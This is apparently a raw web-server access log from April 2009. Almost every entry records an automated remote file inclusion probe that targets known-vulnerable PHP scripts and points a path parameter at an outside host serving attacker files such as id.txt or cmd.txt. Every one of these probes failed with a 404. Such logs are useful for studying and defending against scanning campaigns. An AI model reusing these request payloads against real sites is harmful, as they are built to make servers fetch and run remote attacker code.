70.86.169.162 - - [27/Apr/2009:09:31:38 -0500] "GET /logs/access_log.1233964800//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
195.116.31.151 - - [27/Apr/2009:09:33:37 -0500] "GET /logs//mwchat/libs/errors.php?error=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:09:33:38 -0500] "GET //mwchat/libs/errors.php?error=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
74.55.30.194 - - [27/Apr/2009:09:34:32 -0500] "GET //includes/class_item.php?fileExtension=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:09:34:32 -0500] "GET /logs/access_log.1234656000//includes/class_item.php?fileExtension=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:09:34:32 -0500] "GET /logs//includes/class_item.php?fileExtension=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
149.156.18.19 - - [27/Apr/2009:09:34:50 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
149.156.18.19 - - [27/Apr/2009:09:34:50 -0500] "GET //mambots/content/multithumb/errors.php?error=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
74.55.30.194 - - [27/Apr/2009:09:35:55 -0500] "GET /logs/access_log.1235433600//includes/class_item.php?fileExtension=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
195.116.31.151 - - [27/Apr/2009:09:36:11 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:09:36:13 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
74.55.30.194 - - [27/Apr/2009:09:38:01 -0500] "GET //includes/class_item.php?fileExtension=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:09:38:01 -0500] "GET /logs//includes/class_item.php?fileExtension=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:09:38:01 -0500] "GET /logs/access_log.1234656000//includes/class_item.php?fileExtension=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.190.70.69 - - [27/Apr/2009:09:38:34 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.825"
202.190.70.69 - - [27/Apr/2009:09:38:34 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.825"
74.55.30.194 - - [27/Apr/2009:09:39:44 -0500] "GET /logs/access_log.1235433600//includes/class_item.php?fileExtension=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.190.70.69 - - [27/Apr/2009:09:39:45 -0500] "GET /logs//polarch//modules/agendax/addevent.inc.php?agendax_path=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.825"
202.190.70.69 - - [27/Apr/2009:09:39:46 -0500] "GET //polarch//modules/agendax/addevent.inc.php?agendax_path=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.825"
202.75.4.169 - - [27/Apr/2009:09:42:33 -0500] "GET /logs//polarch//modules/agendax/addevent.inc.php?agendax_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
202.75.4.169 - - [27/Apr/2009:09:42:33 -0500] "GET //polarch//modules/agendax/addevent.inc.php?agendax_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
200.103.16.43 - - [27/Apr/2009:09:45:51 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
200.103.16.43 - - [27/Apr/2009:09:45:52 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
121.165.73.157 - - [27/Apr/2009:09:47:16 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:09:47:16 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:09:47:16 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:09:47:19 -0500] "GET /logs/access_log.1238716800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:09:48:30 -0500] "GET /logs///components/com_simpleboard/image_upload.php?sbp=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:09:48:30 -0500] "GET ///components/com_simpleboard/image_upload.php?sbp=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
82.165.251.195 - - [27/Apr/2009:09:49:52 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.165.251.195 - - [27/Apr/2009:09:49:52 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.165.251.195 - - [27/Apr/2009:09:49:54 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.226.185.169 - - [27/Apr/2009:09:50:28 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 340 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
83.226.185.169 - - [27/Apr/2009:09:50:28 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
83.226.185.169 - - [27/Apr/2009:09:50:28 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
82.165.251.195 - - [27/Apr/2009:09:50:33 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.165.251.195 - - [27/Apr/2009:09:50:33 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.165.251.195 - - [27/Apr/2009:09:50:35 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.226.185.169 - - [27/Apr/2009:09:51:01 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
83.226.185.169 - - [27/Apr/2009:09:51:01 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
83.226.185.169 - - [27/Apr/2009:09:51:01 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 340 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
82.165.251.195 - - [27/Apr/2009:09:51:13 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.226.185.169 - - [27/Apr/2009:09:51:27 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.226.185.169 - - [27/Apr/2009:09:51:27 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.226.185.169 - - [27/Apr/2009:09:51:27 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.226.185.169 - - [27/Apr/2009:09:51:34 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:09:51:34 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:09:51:34 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
62.75.255.125 - - [27/Apr/2009:09:51:55 -0500] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.825"
62.75.255.125 - - [27/Apr/2009:09:51:55 -0500] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.825"
65.55.208.143 - - [27/Apr/2009:09:52:05 -0500] "GET /logs/access_log.1233964800 HTTP/1.1" 200 109546 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.226.185.169 - - [27/Apr/2009:09:52:19 -0500] "GET /logs/access_log.1238716800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
83.226.185.169 - - [27/Apr/2009:09:52:26 -0500] "GET /logs/access_log.1238716800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.226.185.169 - - [27/Apr/2009:09:52:52 -0500] "GET /logs/access_log.1238716800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
82.165.251.195 - - [27/Apr/2009:09:53:25 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.165.251.195 - - [27/Apr/2009:09:54:07 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.190.70.69 - - [27/Apr/2009:09:54:29 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.825"
202.190.70.69 - - [27/Apr/2009:09:54:30 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.825"
195.228.45.60 - - [27/Apr/2009:09:54:51 -0500] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
195.228.45.60 - - [27/Apr/2009:09:54:51 -0500] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.228.45.60 - - [27/Apr/2009:09:54:51 -0500] "GET /logs/access_log.1233014400/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
82.165.251.195 - - [27/Apr/2009:09:54:55 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.228.45.60 - - [27/Apr/2009:09:55:19 -0500] "GET /logs/access_log.1236643200/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:09:55:19 -0500] "GET /logs/home.php?index=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:09:55:20 -0500] "GET /home.php?index=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
195.5.163.212 - - [27/Apr/2009:09:55:37 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yakuza41.t35.com/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
195.5.163.212 - - [27/Apr/2009:09:55:37 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yakuza41.t35.com/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
202.75.4.169 - - [27/Apr/2009:09:56:48 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.75.4.169 - - [27/Apr/2009:09:56:49 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
220.134.10.54 - - [27/Apr/2009:09:57:40 -0500] "GET /logs/include/lib.inc.php?site_path=http://77.74.195.211/modernbill//include/misc/susuwmuw/cmd.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
220.134.10.54 - - [27/Apr/2009:09:57:41 -0500] "GET /include/lib.inc.php?site_path=http://77.74.195.211/modernbill//include/misc/susuwmuw/cmd.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
202.75.4.169 - - [27/Apr/2009:09:59:41 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
202.75.4.169 - - [27/Apr/2009:09:59:42 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
149.156.18.19 - - [27/Apr/2009:10:01:03 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
149.156.18.19 - - [27/Apr/2009:10:01:04 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
149.156.18.19 - - [27/Apr/2009:10:02:03 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
149.156.18.19 - - [27/Apr/2009:10:02:03 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
58.227.193.198 - - [27/Apr/2009:10:05:20 -0500] "GET /logs/index.php?configFile=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
58.227.193.198 - - [27/Apr/2009:10:05:21 -0500] "GET /logs/access_log.1239321600/index.php?configFile=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
58.227.193.198 - - [27/Apr/2009:10:05:21 -0500] "GET /index.php?configFile=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
58.227.193.198 - - [27/Apr/2009:10:05:21 -0500] "GET /logs/access_log.1239235200/index.php?configFile=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
195.116.31.151 - - [27/Apr/2009:10:07:59 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:10:08:00 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
62.75.255.125 - - [27/Apr/2009:10:09:31 -0500] "GET /logs/errors.php?error=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
62.75.255.125 - - [27/Apr/2009:10:09:31 -0500] "GET /errors.php?error=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
195.116.31.151 - - [27/Apr/2009:10:09:39 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:10:09:39 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
209.172.33.230 - - [27/Apr/2009:10:09:58 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ifmall.com//shop/templates/compiled/readme.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
209.172.33.230 - - [27/Apr/2009:10:09:58 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ifmall.com//shop/templates/compiled/readme.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
211.54.11.226 - - [27/Apr/2009:10:15:40 -0500] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.54.11.226 - - [27/Apr/2009:10:15:40 -0500] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.54.11.226 - - [27/Apr/2009:10:15:41 -0500] "GET /logs/access_log.1231200000//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.100.202 - - [27/Apr/2009:10:26:39 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.brightonsupply.com/shop//administrator/components/com_virtuemart/jss/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
65.98.100.202 - - [27/Apr/2009:10:26:40 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.brightonsupply.com/shop//administrator/components/com_virtuemart/jss/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
65.98.100.202 - - [27/Apr/2009:10:26:40 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.brightonsupply.com/shop//administrator/components/com_virtuemart/jss/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
65.98.100.202 - - [27/Apr/2009:10:26:40 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.brightonsupply.com/shop//administrator/components/com_virtuemart/jss/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
85.18.117.101 - - [27/Apr/2009:10:27:33 -0500] "GET //print_category.php?setup[use_category]=1&dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:27:39 -0500] "GET /logs/access_log.1238371200//print_category.php?setup[use_category]=1&dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:27:51 -0500] "GET /logs/access_log.1234656000//print_category.php?setup[use_category]=1&dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:28:43 -0500] "GET //print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:28:43 -0500] "GET /logs//print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:28:43 -0500] "GET /logs/access_log.1234656000//print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:28:43 -0500] "GET /logs/access_log.1238371200//print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:28:48 -0500] "GET /logs/access_log.1235433600//print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:28:49 -0500] "GET //print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:28:51 -0500] "GET /logs//print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:29:02 -0500] "GET /logs/access_log.1234656000//print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:29:51 -0500] "GET /logs/access_log.1235433600//print_category.php?setup[use_category]=1&dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:29:56 -0500] "GET /logs//print_category.php?setup[use_category]=1&dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:29:56 -0500] "GET //print_category.php?setup[use_category]=1&dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.18.117.101 - - [27/Apr/2009:10:30:00 -0500] "GET /logs/access_log.1234656000//print_category.php?setup[use_category]=1&dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:10:30:34 -0500] "GET /logs//print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:10:30:34 -0500] "GET //print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:10:30:34 -0500] "GET /logs//print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:10:30:34 -0500] "GET //print_category.php?setup[use_category]=1&dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
